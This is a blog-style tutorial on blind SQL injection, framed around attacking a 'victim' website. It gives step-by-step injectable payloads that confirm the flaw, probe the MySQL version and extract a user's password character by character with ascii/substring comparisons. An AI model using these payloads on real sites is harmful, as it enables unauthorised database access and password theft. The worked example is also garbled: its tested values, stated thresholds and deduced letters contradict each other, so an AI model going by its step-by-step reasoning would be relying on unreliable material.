Blind SQL Injection (Full Tutorial)!

Welcome to TechynHacky :-)
Here I am Asman Mirza and Today I will show you SQLi Blind Injecting!

I mostly use ordinary SQL Injection myself but sometimes the "union" command don't work or we don't get a versions name
thats why Blind SQL Injection is important too.

So Lets start :-)

First find out victim site. Blind SQL Injections works often on ordinary SQL Injection vulnerable pages too.

Well our victim in this tut is :
http://www.vul-site.com/index.php?id=3

Testing if our Victims is vulnerable or not:

now we have to test if our victim is vulnerable for Blind SQL Injection.

add this:

    and 1 = 0

example url :
http://www.vul-site.com/index.php?id=3 and 1 = 0

now we should get a error.

¤now add this!

    and 1 = 1

example:
http://www.vul-site.com/index.php?id=3 and 1 = 1

Now we will see the website without a error message. That means that our victim is vulnerable.

Find out MySQL version:

Now you have to add and
SUBSTRING(version(),1,1)=5

if you see the website whitout a error the version is 5.
If you get a error try 4 or 3

Lets do the Injection:

The way to do the injection is a bit different to the ordinary way. We don't search for tables etc we only try to get
the password. First we try to get the first letter of the password. You will need this Asci Table .

use this

and ascii(substring((SELECT password from users limit 0,1),1,1))>70

we get a error the asci is to high lets try some lower value
try

    and ascii(substring((SELECT password from users limit 0,1),1,1))>64

no we don't get a error that means that the asci value is higher then 64
lets try 86

    and ascii(substring((SELECT password from users limit 0,1),1,1))>66

no we get a error .
That means our asci is to high. But we no that we didn't got a error at 85 that means our asci is 65.

Now check 85 in asci table.
65 means "A" that means that the first letter of our password is "A"

now we have to get the second latter.

    and ascii(substring((SELECT password from users limit 0,1),2,1))>80

result : error (to high)

    and ascii(substring((SELECT password from users limit 0,1),2,1))>75

result : no error (to low)

    and ascii(substring((SELECT password from users limit 0,1),2,1))>76

result : error

no we know that the second letter of the password is in asci 75.
Open your asci table and check which latter that is

75 = K

now we know the first two letters of the password : AK

well i think you know now how it works to get the next letters you only have to change : 2,1 into 3,1

example :

first letter : "and ascii(substring((SELECT password from users limit 0,1),1,1))>70"

second lettter : "and ascii(substring((SELECT password from users limit 0,1),2,1))>70"

third letter : "and ascii(substring((SELECT password from users limit 0,1),3,1))>70"

¤¤Thanks for Reading n Visiting :-)